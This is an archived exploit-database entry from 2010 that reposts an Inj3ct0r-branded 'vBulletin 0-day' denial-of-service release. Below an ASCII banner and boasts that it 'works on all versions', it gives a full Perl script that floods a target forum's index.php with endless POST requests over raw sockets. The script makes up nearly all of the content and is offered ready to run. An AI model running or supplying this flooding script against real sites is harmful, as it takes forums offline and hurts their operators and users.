vBulletin 0-day Denial Of Service Exploit

2010-04-12T00:00:00
ID SECURITYVULNS:DOC:23594
Type securityvulns
Reporter Securityvulns
Modified 2010-04-12T00:00:00

Description

========================================= vBulletin 0-day Denial Of Service Exploit =========================================

         The largest Exploit Database in the world !

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ 1 1 /' \ /'`\ /\ \ /'`\ 0 0 /\, \ /\\/\_\ \ \ \ \ ,\/\ \/\ \ _ 1 1 \//\ \ /' _ `\ \/\ \//\< /'\ \ \/\ \ \ \ \/\`'\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \/\ \ \\ \ \\ \ \ \/ 1 1 \ \\ \\ \\\ \ \ \_/\ \_\\ \\\ \_/\ \\ 0 0 \//\//\//\ \\ \// \/_/ \/_/ \// \/_/ 1 1 \ \_/ >> Exploit database separated by exploit 0 0 \// type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

[+] Site : Inj3ct0r.com

DOS Vbulletin 93% works..

It works on all versions! can DOS server!

Perl Script

use Socket; if (@ARGV < 2) { &usage } $rand=rand(10); $host = $ARGV[0]; $dir = $ARGV[1]; $host =~ s/(http:\/\/)//eg; for ($i=0; $i<10; $i--) { $user="vb".$rand.$i; $data = "s=" ; $len = length $data; $foo = "POST ".$dir."index.php HTTP/1.1\r\n". "Accept: * /*\r\n". "Accept-Language: en-gb\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". "Host: $host\r\n". "Content-Length: $len\r\n". "Connection: Keep-Alive\r\n". "Cache-Control: no-cache\r\n\r\n". "$data"; my $port = "80"; my $proto = getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto); connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; send(SOCKET,"$foo", 0); syswrite STDOUT, "+" ; } print "\n\n"; system('ping $host'); sub usage { print "\tusage: \n"; print "\t$0 \n"; print "\tex: $0 127.0.0.1 /forum/\n"; print "\tex2: $0 127.0.0.1 /\n\n"; exit(); };

Greetz to SeeMe - Mr,Mo0om

Thanks to Islamic Ghosts Team exploit-db and inj3ct0r.com

Inj3ct0r.com [2010-04-12]